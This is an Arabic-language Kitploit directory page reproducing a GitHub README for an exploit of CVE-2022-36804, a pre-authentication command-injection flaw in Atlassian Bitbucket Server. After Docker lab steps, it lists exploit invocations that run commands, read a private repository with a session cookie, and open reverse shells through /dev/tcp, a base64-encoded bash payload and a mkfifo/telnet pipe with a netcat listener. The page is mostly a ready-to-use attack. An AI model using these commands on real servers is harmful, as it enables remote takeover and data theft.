Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-36804 — تم اكتشاف ثغرة أمنية خطيرة من نوع حقن الأوامر (Command Injection) في نقاط نهاية (Endpoints) متعددة لواجهة برمجة التطبيقات (API) في خادم Atlassian Bitbucket ومركز البيانات (Data Center). تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server وData Center الصادرة قبل الإصدارات <7.6.17 و<7.17.10 و<7.21.4 و<8.0.3 و<8.1.2 و<8.2.2 و<8.3.1 | Kitploit
أدوات/GitHubGitHub/walnutsecurity/cve-2022-36804
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةمختبرات وتدريب عملي
GitHubwalnutsecurity/cve-2022-36804

cve-2022-36804

عرض المستودع
848منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

تم اكتشاف ثغرة أمنية خطيرة من نوع حقن الأوامر (Command Injection) في نقاط نهاية (Endpoints) متعددة لواجهة برمجة التطبيقات (API) في خادم Atlassian Bitbucket ومركز البيانات (Data Center). تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server وData Center الصادرة قبل الإصدارات <7.6.17 و<7.17.10 و<7.21.4 و<8.0.3 و<8.1.2 و<8.2.2 و<8.3.1

مشاركة

CVE-2022-36804: RCE قبل المصادقة في Atlassian Bitbucket Server

تم اكتشاف ثغرة حرجة في حقن الأوامر في نقاط نهاية API متعددة في Atlassian Bitbucket Server وData Center. تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server وData Center الصادرة قبل الإصدارات <7.6.17> و<7.17.10> و<7.21.4> و<8.0.3> و<8.1.2> و<8.2.2> و<8.3.1>

مختبر CVE-2022-36804

بناء Docker

docker build -t bitbucket .

تشغيل Docker

docker run -it bitbucket

استخدام cve-2022-36804.py

التحقق من تنفيذ التعليمات البرمجية عن بُعد (RCE)

python3 cve-2022-36804.py -u http://172.17.0.2:7990

التحقق من RCE باستخدام أمر مخصص (cmd)

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

التحقق من RCE باستخدام أمر مخصص ومفتاح مشروع واسم مستودع

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

التحقق من مستودع خاص

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074CFF8A5D13088332C8DF0CD8A7CE7

الحصول على شل باستخدام netcat

استبدل 172.17.0.3 بعنوان IP المحلي الخاص بك

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"

ابدأ مستمع netcat بالأمر التالي:

nc -lvp 4444

قم بتحويل /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 إلى base64 في حال حدوث خطأ في تنفيذ الحمولة.

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"

إذا كنت لا تزال تواجه أي خطأ، فنفّذ الأمر التالي:

TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"

يُنصح بتثبيت إصدار Bitbucket Server المتأثر بالثغرة على جهاز يعمل بنظام Windows/Linux لأغراض التدريب. سيكون الحصول على قشرة عكسية (reverse shell) أسهل مقارنةً بصور Docker.

يمكن العثور على مزيد من المعلومات هنا

المراجع

  • https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
  • https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
تنزيل الأداة